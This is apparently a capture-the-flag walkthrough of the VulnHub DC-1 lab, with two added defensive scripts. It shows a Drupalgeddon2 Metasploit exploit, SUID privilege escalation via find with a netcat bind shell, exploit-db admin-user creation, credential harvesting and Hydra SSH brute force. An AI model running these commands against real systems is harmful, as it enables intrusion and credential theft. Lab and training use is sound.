
VulnHub Test range DC-1

2025-04-03 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/01 Report--

**IP: 192.168.110.212**

1. Run `arp-scan -l` to list the live hosts on the same network segment.

Knowing the IP, we then visit the home page.

First, gather information: a port scan with nmap finds the following open ports:

22 (ssh), 80 (http), 111 (rpcbind)

```
22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version port/proto service
|   100000 2 4 111/tcp rpcbind
|   100000 2 37414/udp status 3 111/udp rpcbind
|   100000 3 111/tcp6 rpcbind 4 111/udp6 rpcbind
|   100000 3 111/udp6 rpcbind
|   100024 1 35108/tcp6 status
|   100024 1 37240/udp6 status
|   100024 1 37414/udp status
|_  100024 1 51353/tcp status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.83 seconds
```

Version:

Content management system (CMS): Drupal 7

Web server: Apache 2.2.22

Programming language: PHP 5.4.45

Operating system: Debian

JavaScript library: jQuery 1.4.4

2. After collecting the information, I first searched https://www.exploit-db.com/?type=webapps based on these versions, but in the end there was no result. Finally, from the bottom of the home page, I could see that its CMS was Drupal.

Then I looked up its known vulnerabilities on the Internet.

3. In msf, run `search drupal` to query the modules. Because there are many, I first used the relatively recent one:

`unix/webapp/drupal_drupalgeddon2` module

Set the target IP with `set`, start it with `run -j`, and it gets a shell directly.

Enter `python -c 'import pty;pty.spawn("/bin/sh")'`

4. Check the system with `uname -an`; it is Linux.

```
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux
```

For privilege escalation, I looked it up on the Internet.

First use find to search for SUID binaries that could be used to escalate privileges.

```
find / -user root -perm -4000 -print 2>/dev/null
```

If the find command itself turns out to have the SUID bit set, every command executed through find runs with root privileges.
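The same search can be run from the defender's side as a periodic audit. The script below is an added example, not part of the original article: it lists every set-uid file under a directory and flags those whose name is on `RISKY`, an illustrative and non-exhaustive list (an assumption of this example) of programs that can launch other commands, such as the `find` binary found on DC-1.

```shell
#!/bin/sh
# Added example: defensive set-uid audit (not from the original article).
# RISKY is an illustrative, non-exhaustive list assumed for this example:
# programs able to run other commands, so a set-uid bit on them hands
# the file owner's privileges to whoever invokes them.
RISKY="find vim vi nano less more awk gawk nmap bash sh dash env python perl ruby tar cp"

# audit_suid DIR: print "RISKY <path>" or "ok    <path>" per set-uid file.
# -xdev stays on DIR's filesystem, so /proc and network mounts are skipped.
audit_suid() {
    find "${1:-/}" -xdev -type f -perm -4000 -print 2>/dev/null | sort |
    while IFS= read -r path; do
        name=$(basename "$path")
        case " $RISKY " in
            *" $name "*) printf 'RISKY %s\n' "$path" ;;
            *)           printf 'ok    %s\n' "$path" ;;
        esac
    done
}

# count_risky DIR: number of flagged files; non-zero means action is needed.
count_risky() {
    audit_suid "$1" | grep -c '^RISKY ' || true
}

# Stand-alone use: sh suid_audit.sh /
# A flagged file is fixed by dropping the bit: chmod u-s <path>
if [ "$#" -gt 0 ]; then
    audit_suid "$1"
fi
```

Comparing the output against a saved baseline from a known-good install makes a newly added set-uid bit stand out.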

5. I first created a text file myself and then typed:

```
find chen -exec whoami \;
find chen -exec netcat -lvp 5555 -e /bin/sh \;
```

6. The other side is listening.

7. After the privileges were obtained, I first found flag4 in /etc/shadow: flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWC

Continuing to look through the sensitive directory /var/www, we find flag1, which hints: every good CMS needs a configuration file, and so do you.

8. So then I looked up where the Drupal configuration file was on the Internet.

/sites/default/settings.php

I first located it with find.

`cat /var/www/sites/default/settings.php` showed the user name and password here.

```
'username' => 'dbuser', 'password' => 'R0ck3t'
```

Now that we know the user name and password, we can connect.

9. Use cat to view the version information in its configuration file:

```
cat /var/www/includes/bootstrap.inc | grep VERSION
```

This returns `VERSION', '7.24`.

Running `searchsploit Drupal` lists some Python scripts near the top of the results.

```
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.110.212 -u chen -p chen
```

10. Log in with the user name and password just added by the Python script.

11. Because the user name is already known (the user name found in shadow), you can now brute-force it directly with Hydra.

```
hydra -l flag4 -P pass.txt ssh://192.168.110.212
```

12. Now we know that the password is orange.

The connection is successful!

User name: flag4

Password: orange
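A password guessed this way leaves a clear trace in the target's sshd log: a run of failures for one account from one address, then a success. The detector below is an added example, not part of the original article; the log lines are constructed, the source addresses are documentation ranges, and the threshold of 5 is an assumption to tune per environment.

```shell
#!/bin/sh
# Added example: flag SSH password guessing that ended in a successful login.
# The sample lines are constructed for this example, not taken from DC-1.
sample_log() {
cat <<'EOF'
Apr  3 10:00:01 DC-1 sshd[2101]: Failed password for flag4 from 192.0.2.10 port 40110 ssh2
Apr  3 10:00:02 DC-1 sshd[2102]: Failed password for flag4 from 192.0.2.10 port 40112 ssh2
Apr  3 10:00:03 DC-1 sshd[2103]: Failed password for flag4 from 192.0.2.10 port 40114 ssh2
Apr  3 10:00:04 DC-1 sshd[2104]: Failed password for flag4 from 192.0.2.10 port 40116 ssh2
Apr  3 10:00:05 DC-1 sshd[2105]: Failed password for flag4 from 192.0.2.10 port 40118 ssh2
Apr  3 10:00:06 DC-1 sshd[2106]: Failed password for flag4 from 192.0.2.10 port 40120 ssh2
Apr  3 10:00:07 DC-1 sshd[2107]: Accepted password for flag4 from 192.0.2.10 port 40122 ssh2
Apr  3 11:30:00 DC-1 sshd[2300]: Failed password for flag4 from 198.51.100.7 port 51000 ssh2
Apr  3 11:30:09 DC-1 sshd[2301]: Accepted password for flag4 from 198.51.100.7 port 51002 ssh2
EOF
}

# detect_bruteforce THRESHOLD < log
# Prints "ip user failures" for every (ip, user) pair that had at least
# THRESHOLD failed passwords before a password was accepted.
detect_bruteforce() {
    awk -v min="${1:-5}" '
    function key(   i) {
        # works for "for NAME from IP" and "for invalid user NAME from IP"
        for (i = 2; i < NF; i++)
            if ($i == "from") return $(i + 1) " " $(i - 1)
        return ""
    }
    / sshd\[[0-9]+\]: Failed password for /   { k = key(); if (k != "") fails[k]++ }
    / sshd\[[0-9]+\]: Accepted password for / {
        k = key()
        if (k != "" && fails[k] >= min) print k, fails[k]
    }'
}

# Stand-alone demo on the constructed sample; on a real host feed it the
# sshd log instead, for example: detect_bruteforce 5 < /var/log/auth.log
sample_log | detect_bruteforce 5
```

The single mistyped password from 198.51.100.7 stays below the threshold and is not reported, while the guessing run from 192.0.2.10 is.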
